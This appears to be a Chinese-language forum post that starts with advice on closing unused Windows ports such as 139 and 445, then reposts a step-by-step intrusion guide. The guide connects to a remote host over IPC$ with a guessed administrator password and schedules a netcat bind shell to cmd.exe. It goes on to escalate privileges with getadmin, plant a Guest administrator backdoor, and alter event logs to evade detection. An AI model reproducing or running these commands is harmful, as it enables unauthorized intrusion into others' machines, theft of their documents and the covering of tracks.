網路城邦
回本城市首頁 簡樂(ㄌㄜˋ)社
市長:阿光老師  副市長:
加入本城市推薦本城市加入我的最愛訂閱最新文章
udn城市學校社團高中職【簡樂(ㄌㄜˋ)社】城市/討論區/
討論區新東西。新學習 字體:
上一個討論主題 回文章列表 下一個討論主題
防止無使用到的 port 被攻擊的方法(看的懂就看吧)內附駭客攻擊實錄
 瀏覽10,953|回應0推薦0

lime300
等級:
留言加入好友
轉至:http://yi-fan.no-ip.org/dz/viewthread.php?tid=1415&extra=page%3D3



HTTP : 80

FTP : 21 & 23

BT : 2048以上



禁止Windows 開放 NetBIOS 服務

NetBIOS是 Win 98, NT 4, 2000, XP 等作業系統預設上自動開啟的分享服務,使用者可以經過遠端方式存取本機電腦,預設包括 IPC$,
C$, Admin$ share等‧
基本上這是一個非常方便的資源,但由於它可以遠端連線存取,我們也必須顧慮到安全上的問題(例如敏感性資料、駭客/病毒入侵等)...
大部份情況下,我們甚至根本不需要這種服務存在! 所以,我們不如把Port 139 (NetBIOS) & 445 (SMB) 關閉
(以下適用給Windows 2000, XP使用者):



例如 : 337 338 .... 訊息傳遞port ...改成只出不入可以減少主機傳出port的數量



可以加快bt或ftp外傳輸



埠:161

服務:SNMP

說明:Simple Network Management Protocol(SMTP)(簡單網路管理協定)

SNMP允許遠端管理設備。所有配置和運行資訊的儲存在資料庫中,通過SNMP可獲得這些資訊。許多管理員的錯誤配置將被暴露在Internet。Cackers
將試圖使用默認的密碼public、private訪問系統。他們可能會試驗所有可能的組合。SNMP包可能會被錯誤的指向用戶的網路。



埠:137、138、139

服務:NETBIOS Name Service

說明:其中137、138是UDP埠,當通過網上鄰居傳輸檔時用這個埠。而139埠:通過這個埠進入的連接試圖獲得NetBIOS/SMB服務。這個協議被用於windows檔和印表機共用和SAMBA。還有WINS Regisrtation也用它。



這打開會開放共用權限



基本上所謂port打開是指作業系統會理會該port傳入的資料,並回應。某個成程度上可以下達指令,很危險



【Port 445】SMB Session



當Port 139不存在(無回應)的時候,Windows會自己自動開啟Port 445,也就是SMB Session (Server Message
Block)‧
如果這一個端口是開啟的,那麼遠端使用者就還是照樣有辦法知道您的電腦很多資訊,例如帳號清單(沒密碼)、密碼長度、密碼過期日期、系統名稱、
Domain... 等等‧ 所以,建議您關閉SMB Session:(R)



(netstat -a -n 可以檢查自己有哪些port被開放不過別再bt啟動下用)

以下轉載自 http://www.ntut.edu.tw/~t5598004/








IPC入侵全攻略
本文作者:不詳
文章出處:不詳
文章性質:轉載
閱讀次數:355
發佈日期:2006-02-13
 

IPC是Internet Process Connection的縮寫,也就是遠端網路連線。它是Windows NT及Windows
2000特有的一項功能,特點是在同一時間內,兩個IP之間只容許建立一個連接。好了,廢話少說,現在進入主旨。


如何找到具有IPC漏洞的主電腦呢?以前我都是群組合一個國外的掃瞄工具(名字我忘了)和KillUSA的LetMeIn,因為很多工作都是手動完成的,所
以速度可想而知了。現在因為有了小榕的流光2000,所以找到這樣的主電腦實在是太簡單了,具體操作我就不說了,大家可以參考該軟體的說明文檔。

好了,假設我們已經找到了一台這樣的主電腦,位址是139.223.200.xxx,管理員帳號是
Administrator,密碼是123456。進入指令行方式,正式開工。需要說明的是,以下操作都是在目的主電腦沒有禁止遠端IPC$連接和啟動
Schedule服務的理想情況下進行的。

F:\>net use \139.223.200.xxx\ipc$ "123456"
/user:"Administrator"
指令成功完成。

F:\>copy nc.exe
\139.223.200.xxx\admin$
已複製 1 個檔案。

F:\>net time
\139.223.200.xxx
\139.223.200.xxx 的目前的時間是 2000/12/25 上午 10:25

\139.223.200.xxx 的近端時間 (GMT - 07:00) 是 2000/12/25 上午10:35
指令成功完成。


F:\>at \139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe

新增加了一項作業,其作業 ID = 0

F:\>telnet 139.223.200.xxx 1234


上面的指令很簡單,你只要參考一下net,at和nc的使用方式就可以了。這樣,我們就登上了遠端的主電腦。最理想的情況是這樣的,但是,也許你會遇到目的主電腦的Schedule服務沒有啟動的情況,那麼,at指令就不能用了,我們就需要增加以下步驟。


F:\>at \139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe

服務仍未啟動。

F:\>netsvc \139.223.200.xxx schedule /start

Service is running on \139.223.200.xxx


登上遠端主電腦之後,我們可以做什麼呢?這要視這個帳號的權限以及該主電腦的安全策略來決定。如果你的權限不夠的話,可以試試下面的步驟。首先在近端執行下面的指令。


F:\>copy getadmin.exe \139.223.200.xxx\admin$
已複製 1 個檔案。


F:\>copy gasys.dll \139.223.200.xxx\admin$
已複製 1 個檔案。


其次,在遠端主電腦執行下面的指令。

C:\WINNT\system32>getadmin


如果成功的話,你就是這台主電腦的管理員了,權限夠大了吧?:-)


那麼,現在我們能做什麼呢?改主頁?下載SAM資料庫?都可以啦!方法有很多,我就不一一說了,具體方法可以參考相關教學。我一般對目的主電腦上的WORD文檔和資料庫比較感興趣,呵呵。。。


其實,如果你在這台機子上面放個木馬或是病毒什麼的東東,做起事來更容易一些,但是我覺得如果你跟他沒什麼深仇大恨的話,還是不要這麼做了,這樣不好。


作完了你要做的事,不要忘了做個後門。

C:\WINNT\system32>net user Guest
30906766
net use Guest 30906766
The command completed
successfully.

C:\WINNT\system32>net localgroup administrators
Guest /add
net localgroup administrators Guest /add
The command
completed successfully.


這是個比較簡單的後門,要想做的更好一些,可以像Linux那樣,做出一套RootKits來,其實這樣的東東目前已經有了,你只要拿來用就可以了。笛a真是簡單多了,那麼多的傻瓜工具任你用,哎!要想自保,不學點安全知識怎麼行呢?



後,我們得修理一下日誌。雖然Redp0wer告訴我很少管理員會看NT的日誌,但是我想修理一下還是有用的。NT的日誌在什麼地方呢?可以參考XUDI
的文章。但是有一點要記住的是,日誌只能修改,不能刪除,否則就是自己把自己出賣了!:-)這方面的指令行工具也不少,你可以到一些國外的站臺去看看。


其實有了這台主電腦,你還可以做的更多。





本文於 修改第 3 次
回應 回應給此人 推薦文章 列印 加入我的文摘

引用
引用網址:https://city.udn.com/forum/trackback.jsp?no=63412&aid=3614783